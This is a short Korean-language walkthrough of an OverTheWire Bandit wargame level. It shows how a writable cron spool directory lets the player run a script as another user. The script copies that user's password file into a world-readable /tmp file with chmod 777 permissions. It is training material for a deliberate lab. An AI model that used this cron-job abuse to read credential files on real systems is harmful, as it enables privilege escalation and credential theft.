728x90
cd /etc/cron.d
문제에서 제시한 경로로 이동한다.
ls
cronjob_bandit24 파일을 읽어보자.
cat cronjob_bandit24
위에서 제시한 경로에 있는 파일을 읽어보자.
cat /usr/bin/cronjob_bandit24.sh
/var/spool/$myname 에 있는 파일은 실행되면 60초 안에 삭제된다.
사본 파일을 저장할 임시 디렉토리를 만들자.
mkdir /tmp/eskim
cd /tmp/eskim
위의 디렉토리 안에 bandit24 password 파일을 bandit_pass 파일에 저장하도록 실행시키는 dump.sh 파일을 만들자.
cat > dump.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/eskim/bandit_pass
bandit24 파일이 user가 bandit24일 때만 열리므로 bandit23일 때도 열 수 있도록 권한을 내려주자.
chmod 777 dump.sh
chmod 777 /tmp/eskim
이제 dump.sh 파일을 /var/spool/bandit24로 복사해도 된다.
cp dump.sh /var/spool/bandit24
잘 실행되어 password가 bandit_pass파일에 쓰였는지 확인해보자.
cat bandit_pass
다음 레벨로 가기 위한 password를 확인할 수 있다.
728x90